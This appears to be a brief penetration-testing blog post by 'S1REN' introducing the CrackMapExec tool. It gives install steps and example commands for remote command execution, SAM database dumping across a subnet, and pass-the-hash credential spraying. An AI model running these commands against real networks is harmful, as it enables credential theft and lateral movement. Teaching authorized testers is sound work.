

S1REN
Going down the range.
So lets discuss a bit about Crack Map Execute.
The more targeted your user/pass or hash list - the more targeted your attack.
This tool is the go-to tool for internal engagements when performing large sweeps or 'Credential Spray' Attacks across a variety of protocols.
I encourage you to do some research on what protocols crackmapexec supports!
+ Here's where you're going to get it:
https://github.com/byt3bl33d3r/CrackMapExec
+ Python Package:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec
+ Install From Source:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
Examples:
--> Execute 'whoami'
crackmapexec 192.168.1.5 -u Administrator -p 'PASS' -x whoami
-->Show Domain Administrators.
crackmapexec 192.168.1.5 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PS Version Table:
crackmapexec 192.168.1.5 -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List out Machine Users.
crackmapexec 192.168.1.5 -u 'Administrator' -p 'PASS' --lusers
--> Dump SAM Database.
crackmapexec 192.168.1.0/24 -u 'Administrator' -p 'PASS' --local-auth --sam
--> Lets Pass The Hash against an entire subnet!
crackmapexec smb 192.168.1.0/24 -u 'Administrator' -H 'LM:NTLM' --local-auth
Don't mind me - just pwning an entire network in one sweep...
CrackMapExec!
Comments are closed.